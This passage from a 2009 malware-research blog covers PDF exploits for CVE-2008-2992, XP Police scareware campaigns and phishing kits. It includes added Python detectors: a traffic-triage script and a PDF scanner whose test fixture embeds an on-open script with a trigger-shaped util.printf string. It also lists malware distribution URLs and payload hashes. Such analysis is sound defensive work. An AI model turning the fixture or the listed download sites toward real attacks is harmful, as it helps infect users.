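GET /buy.php?id=108 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Cookie: id=108
"""

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD)\s+(\S+)\s+HTTP/1\.[01]$")
HEADER_LINE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")
# Agents seen in the capture.  Genuine wget identifies itself as "Wget/<version>".
ROGUE_AGENTS = {"MS_Update32", "wget 3.0"}
PAYLOAD_PATH = re.compile(r"\.(exe|dll|dat)(\?|$)", re.I)


@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)

    def header(self, name: str) -> str:
        return self.headers.get(name.lower(), "")


def parse_requests(capture: str) -> list:
    """Pull client requests out of a plain-text capture.  A response status line,
    body bytes or anything else that is not a header ends the current request."""
    requests, current = [], None
    for raw in capture.splitlines():
        line = raw.strip()
        if not line:
            continue                       # blank lines between headers are tolerated
        m = REQUEST_LINE.match(line)
        if m:
            current = Request(m.group(1), m.group(2))
            requests.append(current)
            continue
        h = HEADER_LINE.match(line)
        if h and current is not None:
            current.headers[h.group(1).lower()] = h.group(2)
        else:
            current = None
    return requests


def triage(requests: list) -> list:
    """Alerts worth raising on this traffic: rogue agents, binaries fetched by a
    non-browser agent, and the purchase page where card data is requested."""
    alerts = []
    for r in requests:
        ua, host = r.header("User-Agent"), r.header("Host")
        if ua in ROGUE_AGENTS:
            alerts.append("rogue user-agent %r fetching %s%s" % (ua, host, r.path))
        elif not ua.startswith("Mozilla/") and PAYLOAD_PATH.search(r.path):
            alerts.append("non-browser agent %r fetching binary %s%s" % (ua, host, r.path))
        if r.path.startswith("/buy.php"):
            alerts.append("rogue AV purchase page on %s (card data will be requested)" % host)
    return alerts


def campaign_ids(requests: list) -> set:
    """The numeric id carried in the URL and the cookie, presumably the affiliate or
    campaign identifier (an assumption; the post does not say what it is)."""
    ids = set()
    for r in requests:
        for text in (r.path, r.header("Cookie")):
            ids.update(re.findall(r"\bid=(\d+)", text))
    return ids


if __name__ == "__main__":
    reqs = parse_requests(SAMPLE_CAPTURE)
    for alert in triage(reqs):
        print("ALERT:", alert)
    print("campaign ids:", campaign_ids(reqs))
```

The same three checks translate directly into proxy-log or IDS rules: match the two agent strings exactly, flag any .exe/.dat fetched by an agent that is not a browser, and watch for the purchase page, which is the point at which the victim loses money rather than just a clean machine.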

Related Information
Aggressive strategy of XP Police Antivirus infection
Campaign spreading XP Antivirus Police through Visual Social Engineering


# Jorge Mieres

Sunday, March 8, 2009

Exploitation of vulnerabilities through PDFs

Exploiting weaknesses in widely used applications is today one of the attack vectors most employed by malware, and in this vein I have already posted about the exploitation of vulnerabilities through SWF and JS files.

In this case the attacker's goal is to find computers with versions of Adobe Acrobat and Adobe Reader vulnerable to the buffer overflow described in CVE-2008-2992.

A concrete example is the address http://prororo7.net/sp/index . php: accessing the malicious URL displays nothing, but in the background the exploit code tries to exploit the bug if it finds a vulnerable reader.

In this example the malicious PDF f.pdf (MD5: 2de9de23f9db1e7b1e39d0481a372399) uses the util.printf function from JavaScript to download and run an arbitrary remote file.

The malicious code appears as load.exe (MD5: a6e317f29966fa9e2025f29c7d414c0a) and is downloaded from http://prororo7 .net/sp/l .php?b=4&s=p.

Unfortunately, those who propagate the PDF constantly modify it to avoid detection by antivirus software, and I say "unfortunately" because the detection rate for malicious PDFs so far is extremely low. As the VirusTotal report shows, only five (5) of 39 AV engines would have prevented the infection.

A similar situation occurs with the file doc.pdf (MD5: 5fa343ebca2dd5a35b38644b81fe0485), which is called from http://toureg-cwo .ch/fta/index.php and downloads the file 1.exe (MD5: 5c581054fbce67688d2666ac18c7f540), whose detection rate is even lower than the previous one (4/39).

Many web addresses are being actively used to spread malware this way:

tozxiqud .cn/nuc/spl/pdf .pdf
teirkmm .net/nuc/spl/pdf .pdf
hayboxiw .cn/nuc/spl/pdf .pdf
www.ffseik .com/nuc/spl/pdf .pdf
www.kuplon .biz/smun/pdf .php?id=2435&vis=1
www.geodll .biz/ar/spl/pdf.pdf
setcontrol .biz/ar/spl/pdf .pdf
newprogress .tv/fo/spl/pdf .pdf
eddii .ru/traffic/sploit1/getfile .php?f=pdf
google-analytics.pbtgr .ru/pdf .php?id=48462
hardmoviesporno .com/rf/exp/update1 .pdf


As you can see, the chances of falling victim to these infection strategies are high, and consequently it is extremely important for those who use Adobe's applications to patch as soon as possible.
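With AV detection that low, a static check of your own is worth having. CVE-2008-2992 is triggered through util.printf called from a PDF's JavaScript with an oversized field width in the format string, and the script is usually tucked into a FlateDecode stream that runs from an /OpenAction. As an added example (not from the original post, and not an exploit), the Python below inflates the streams of a PDF, reports the keys that cause script to run on open, and flags util.printf calls whose field width is far larger than any legitimate formatting would need. The constructed fixture document, the width threshold and the function names are assumptions; the sample files from the post are not reproduced here.

```python
import re
import zlib

# Dictionary keys whose presence means the reader may run script on open.
SCRIPT_KEYS = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS")
# A stream object: a dictionary with no nested '<<', then stream ... endstream.
STREAM_RE = re.compile(rb"<<((?:(?!<<).)*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)
# util.printf("%<width>f", ...): the oversized field width is what CVE-2008-2992 abuses.
PRINTF_RE = re.compile(rb"util\.printf\s*\(\s*\"%[-+ 0#]*(\d+)")
WIDTH_LIMIT = 1000          # heuristic: no legitimate document formats a number this wide


def decoded_streams(pdf: bytes):
    """Yield (dictionary, body) for every stream, inflating FlateDecode bodies."""
    for dictionary, body in STREAM_RE.findall(pdf):
        if b"/FlateDecode" in dictionary:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass        # corrupt or obfuscated stream: scan the raw bytes instead
        yield dictionary, body


def scan_pdf(pdf: bytes) -> list:
    """Return human-readable findings; an empty list means nothing matched."""
    findings = []
    for key in SCRIPT_KEYS:
        if key in pdf:
            findings.append("object key %s present" % key.decode())
    views = [pdf] + [body for _, body in decoded_streams(pdf)]
    for view in views:
        for m in PRINTF_RE.finditer(view):
            width = int(m.group(1))
            if width > WIDTH_LIMIT:
                findings.append("util.printf with field width %d (CVE-2008-2992 pattern)" % width)
    return findings


def build_sample_pdf(script: bytes, compress: bool = True) -> bytes:
    """Constructed minimal PDF that runs `script` on open (no xref table; the
    scanner never needs one).  Test fixture only, not a sample from this page."""
    body = zlib.compress(script) if compress else script
    filt = b" /Filter /FlateDecode" if compress else b""
    parts = [
        b"%PDF-1.4\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n",
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n",
        b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n",
        b"4 0 obj << /Length " + str(len(body)).encode() + filt + b" >>\nstream\n",
        body,
        b"\nendstream\nendobj\n",
        b"trailer << /Root 1 0 R >>\n%%EOF\n",
    ]
    return b"".join(parts)


if __name__ == "__main__":
    # Harmless trigger-shaped string used only to exercise the detector.
    sample = build_sample_pdf(b'util.printf("%99999f", 0);')
    for finding in scan_pdf(sample):
        print("FINDING:", finding)
    print("benign document:", scan_pdf(build_sample_pdf(b'app.alert("hello");')))
```

Real samples add layers the scanner does not peel (string concatenation, eval of decoded blobs, other stream filters), so treat a hit as confirmation and a miss as nothing more than "no obvious trigger"; the presence of /OpenAction with /JS is by itself enough reason to open the file in a sandbox rather than in Reader.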

Related Information
Exploiting vulnerabilities through SWF - Spanish version
Exploitation of vulnerabilities through JS - Spanish version


# Jorge Mieres

Friday, March 6, 2009

Aggressive strategy of XP Police Antivirus infection

After commenting on the visual social-engineering campaign used by the scareware XP Police Antivirus, we find an extra ingredient that also tries to fully exploit social engineering and the natural weaknesses of the human factor.

The same domain from which the binary install.exe is downloaded is used to distribute another trojan through a fake PornTube page: codec.exe (MD5: a90e8a945f5cce31db00cac14a26418c), also belonging to the XP Police Antivirus family.

Once it infects the computer, the trojan creates shortcuts on the user's desktop pointing to the following websites, in order to spread spam:

Cheap Pharmacy Online >> http://www.quality-rx .com/?fid=1056
Cheap Software >> http://allisoftware .com
VIP Casino >> http://affiliate.goldvipclub .com/remote/SmartDownload.asp?affid=760
MP3 Download >> http://www. mp3sale .ru/?pid=507
SMS TRAP >> http://www.smstraper .com/go/MTEzOjA=/
Search Online >>http://www.adultwebfind .com/search .php?aid=16851&keyword=sex

Opening the VIP Casino shortcut downloads the executable SmartDownload.exe (MD5: 0f47f132f9e3d2790a6b27ffc2c502b0), and the MP3 Download shortcut leads to http://xp-police-09 .com/lands/error/, from where a new deception strategy is deployed by simulating an error.

After a few seconds, pop-up windows begin to appear displaying alerts about supposed infections and prompts to register the fake program.

However, up to this point these are only the actions visible to the victim; in the background, other actions are taking place that directly involve downloading the components of the XP Police Antivirus scareware.

Related Information
Campaign spreading XP Antivirus Police through Visual Social Engineering - Spanish version
New strategy of social engineering to spread IE Defender - Spanish version


# Jorge Mieres

Wednesday, March 4, 2009

Phishing Kit: automatic creator of fraudulent sites

Cybercrime is on the agenda, and criminals are putting all their effort into refining and automating their strategies in order to further fuel the whole network of criminals who profit at the expense of users.

One of the most common scams today is the phishing attack, where one of the methods normally used is cloning the sites of financial institutions and banks, seeking to obtain sensitive data through deception that exploits the weaknesses of the human factor.

However, site cloning isn't always limited to pages resembling those of real banks; it can also take aim at popular and well-known sites, as we saw in a previous post.

Now the question is: how do they manage to automate the creation of fake pages?

Clearly, the answer revolves around simple, easy-to-use programs such as the one with the following interface.

These programs allow a page to be cloned with minimal effort: simply copy the source code of the real web page, feed it to the program and make a couple of clicks to obtain the fraudulent site, with the option of "playing" with the code and adapting it to whatever benefits the attacker.

In this way the file structure we mentioned a few days ago is obtained, with the creation of a plain text file and a login.php, producing results like the following, which are then spread through social engineering.

The result is very similar to the legitimate site, so the deception is practically impossible to detect for users with little experience of this type of criminal strategy.

On the other hand, this is a latent risk because committing fraud in this style isn't limited to people with advanced computer knowledge: anyone who knows how to copy and paste can have a fraudulent site in use within minutes.

Related Information
Phishing Kit In-the-Wild for cloning of web site, version 2 - Spanish version
Phishing Kit In-the-Wild for cloning of web site - Spanish version


# Jorge Mieres

Monday, March 2, 2009

Analysis of a web-based malware attack

Abstract: The Internet has become an ally and attack platform for malware creators, who, by using and combining different techniques such as Drive-by-Download, Drive-by-Update, scripting and exploits, among others, seek to recruit an army of computers that respond only to their malicious instructions.

These attacks, which use the Internet as the basis for delivering damaging payloads directly to the victim, in parallel, almost instantaneously and transparently to the less experienced user, have become a latent and dangerous risk of infection through the simple act of accessing a website.

The following document sets out a concrete example that uses the above actions to exploit and infect a victim, and also describes several extra features that increase the damage caused by the malware.

Author: Jorge Mieres

Full article is available here.

Sunday, March 1, 2009

Economic Crash: Impact on Security Community

Well, the market has gone down just like any other industry, and there have been lay-offs and price cuts left and right.

What about training industry?

Security training orgs are still charging the same. Is this practical in the current situation? They should realize that they could lose their market, due to:
* Lay-offs.
* No salary raises or bonuses this year at many companies.
* Training expenses being cut at many firms because of this situation.
* Free training options starting to spread.

What about products and services?

Do security firms reduce the price of the services and products they provide? If they don't, they will lose a few customers or fail to gain new ones. But if they do, will they compensate by cutting their analysts/engineers or the quality of their services? Are consumer product prices going any lower to reach more people? Do home users understand the importance of security over the cost of purchasing a tool?

What about consultants?
Do consultants have the same open doors as they had in previous years? Are they able to demand the same money for the work they do, or have rates gone down? Presumably the answer is "yes" [to some extent], but it depends on the individual situation.

What about small and medium sized businesses?
Are small and medium-sized orgs able to cope with the security issues they deal with on a daily basis? Are they able to fund their team to secure their assets [tools, products, work, data, etc.] and ensure business continuity?

There are more questions that require answers. What other questions do you have? What answers do you get? Contact us [contact.fingers @ gmail.com] with any questions you have, and we will help you find your answers...

- EF

Campaign spreading XP Antivirus Police through Visual Social Engineering

Deception strategies based on visual social engineering, such as those that simulate watching videos online and try to get malware downloaded under the pretext of a missing codec, have become rife and almost the rule. Users should keep this in mind in order to avoid a potential infection.

On another occasion I described how the scareware IE Defender used a similar campaign to spread its installer with the same deception strategy. This time it is XP Police 2009's turn to exploit this technique.

All the domains involved in the campaign lead to http://sexybabes18 .com/video/ at the IP address 84.243.197.10. From there, a binary file called install.exe (MD5: 6ba25f5f8ed91db92305f92beef1fe84) is downloaded from the XP Police 2009 website.

By accessing the scareware website, which uses the IP addresses 213.163.65.10, 213.163.65.10 and 206.125.44.28, we can verify that the file downloaded is the same.

The domains currently operated by XP Police 2009 are:



This attack technique is actively used by scareware, and this is only one of the many families that exist, so we can expect to see more fake security programs using this strategy.

Related Information
New strategy of social engineering to spread IE Defender - Spanish version


# Jorge Mieres